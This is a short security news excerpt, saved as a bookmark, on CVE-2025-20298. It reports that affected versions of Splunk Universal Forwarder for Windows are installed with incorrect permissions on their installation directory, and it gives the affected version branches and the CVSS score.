The vulnerability manifests when Universal Forwarder for Windows versions below 9.4.2, 9.3.4, 9.2.6, and 9.1.9 are newly installed or upgraded to an affected version.

During these processes, the installation directory—typically located at C:\Program Files\SplunkUniversalForwarder—receives incorrect permissions that allow non-administrator users to access the directory and all its contents.

This represents a significant breach of the principle of least privilege, a cornerstone of enterprise security frameworks.

The CVSSv3.1 vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H indicates that while the attack requires low-level privileges and user interaction, it can result in high impact across confidentiality, integrity, and availability.

The network attack vector component suggests potential for remote exploitation under certain circumstances.

The scope of this vulnerability is considerable, affecting four major release branches of Splunk Universal Forwarder for Windows.

Specifically, the vulnerability impacts versions in the 9.4 branch below 9.4.2, the 9.3 branch below 9.3.4, the 9.2 branch below 9.2.6, and the 9.1 branch below 9.1.9.

cybersecuritynews EN 2025 CVE-2025-20298 vulnerability
page 6 / 225
4497 links
Shaarli - The personal, minimalist, super-fast, database free, bookmarking service par la communauté Shaarli - Theme by kalvn - Curated by Decio